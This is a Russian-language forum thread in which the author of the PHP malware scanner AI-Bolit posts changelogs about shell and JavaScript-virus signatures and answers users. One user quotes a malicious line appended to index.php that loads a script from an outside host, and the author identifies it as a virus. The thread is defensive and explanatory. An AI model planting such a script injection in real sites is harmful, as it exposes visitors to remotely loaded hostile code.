[Eldar]

Проверку в скрипте на обнловления планируется ввести ? Если есть обновление - можно отсылать соответсвующее письмо на почту :)

[mnemonic]

Планируется. На счет письма - не уверен. Просто будет показываться сообщение о неактуальности текущей версии.

Кроме того, вышла новая версия 20120430:

- новые сигнатуры вирусов и шеллов
- исправлена ошибка сканирования списка файлов
- исправлена ошибка подсчета файлов в каталоге для вычисления дорвеев
- корректная работа с русскими сообщениями при работе через веб и при запуске из командной строки
- выставляется принудительно кодировка utf-8
- добавлены сниппеты для javascript вирусов и некоторых видов редиректа в .htaccess
- немного улучшен дизайн отчета
- сообщение о найденных больших файлах выдается только при полном сканировании

[mnemonic]

Новое в версии 20120512

- добавлен алгоритм дешифрования ASCII последовательностей перед проверкой сигнатур - это очень серьезный прорыв. Теперь кол-во детектируемого зла вырастет в разы.
- три новых сигнатуры JS вируса
- три сигнатуры шелла
- добавлена проверка .phtml и .shtml по-умолчанию
- исправлена ошибка отображения файлов с невидимыми ссылками

Рекомендую скачать и проверить ваши сайты.
http://revisium.com/ai/

[- Den -]

добавлена проверка .phtml и .shtml по-умолчанию

а еще есть khtml :)

[mnemonic]

Изменения в версии 20120613

- добавлены 6 сигнатур шеллов
- добавлены 3 сигнатуры JS вирусов
- добавил вызов set_time_limit(0) в скрипт
- исправлена работа с расширениями для php
- учитывается .phtml при проверке на сигнатуры, добавлено расширение .khtml
- добавлено детектирование auto_append_file/auto_prepend_file в .htaccess
- вывод списка найденных невидимых ссылок
- добавил определение stripos, если ее нет в PHP
- исправлено несколько мелочей

Качаем http://revisium.com/ai/.

Рекомендую проверять хостинг в режиме "все файлы" хотя бы раз в месяц. В качестве бонуса вот еще статейку написал: http://www.revisium.com/kb/protect_advice.html

[Kyrsor]

5 бальная вещь! Надеюсь будите развивать!

[valnick]

скачал. проверяю. спасибо! уверен что штука оч. нужная. особенно для моего сайта :) - индусы, китайци и латиносы уже задолбали искать дыры и подбирать пароли... однако иногда им это удавалось..

Для информации - я настроил апаче так, что вместо .htaccess используется другой файл. и никто не знает какой.... кроме апаче и меня... может кому тоже пригодится такая защита от вирусов - .htaccess есть, а апаче он и не нужен - приманка для вирусов. а кто туда полез - того в бан по IP.

А реально ли сделать такой скрипт, что бы он ловил обращения к сайту "на лету" + банил по IP и по всяким вредным для сайта запросам и атакам на Mysql и БД? В своё время я делал подобное - но только для .exe файлов. Т.е. файл (сайт) сам себя защищает от вторжений и от несанкционированных изменений.

---------- Сообщение добавлено 03:58 ---------- Предыдущее 03:32 ----------

mnemonic,echo '<script src="http://stat.dontexist.com/style.js"></script>'; -вот такая штука дописывается в конец конец файла индекс.пхп и сайту приходит пипец. это что за хрень?

[mnemonic]

valnick, про .htaccess вы бы написали инструкцию для людей, как это сделать. Да и нужно пояснить, что это можно будет сделать только на выделенном сервере (или виртуальном выделенном).

вот такая штука дописывается в конец

Вирус. Подключаться может многими вариантами: из БД, через auto_append, просто по FTP. Если интересуют детали - напишите мне на почту (на сайте айболита есть).

Вот почитать на ночь:
http://forum.searchengines.ru/showpo...8&postcount=58
http://www.revisium.com/kb/protect_advice.html

[mnemonic]

Изменения в версии 20120622

- появился список игнорируемых файлов .aignore
- добавлена возможность просмотра файла
- добавлены сигнатуры шеллов
- есть возможность скрыть в отчете показ директории открытых на запись
- в подозрительные добавлены подстроки, появляющиеся в обфусцированных скриптах
- добавлена проверка на наличие хакерских тулзов для FreeBSD
- несколько багфиксов

Теперь можно ткнуть в имя файла и посмотреть его полное содержимое.
А еще в этой версии я все-таки решил реализовать список игнорируемых файлов (по фрагменту имени и контрольной сумме). Можно вручную создать файл .aignore и положить в него

фрагмент имени файла1 <табуляция> контрольная сумма1
фрагмент имени файла2 <табуляция> контрольная сумма2
...

А можно просто кликать по значениям столбца CRC32, а потом внизу скопировать из формы содержимое в файл. Если вам надоело наблюдать длинный список ложносрабатываемых файлов из джумлы, tinyMCE, vBulletin или друпала, просто создайте свой собственный .aignore и положите его рядом с ai-bolit.php.

Качаем свежую версию http://revisium.com/ai/ с обновленными сигнатурами.
Скоро сделаю еще много полезных фишек в скрипте. Следите за апдейтами.

[volos_86]

mnemonic, Внушительный такой список изменений получился. Было бы круто распространять такой файл (по умолчанию или по желанию) для дефолтных сборок популярных цмс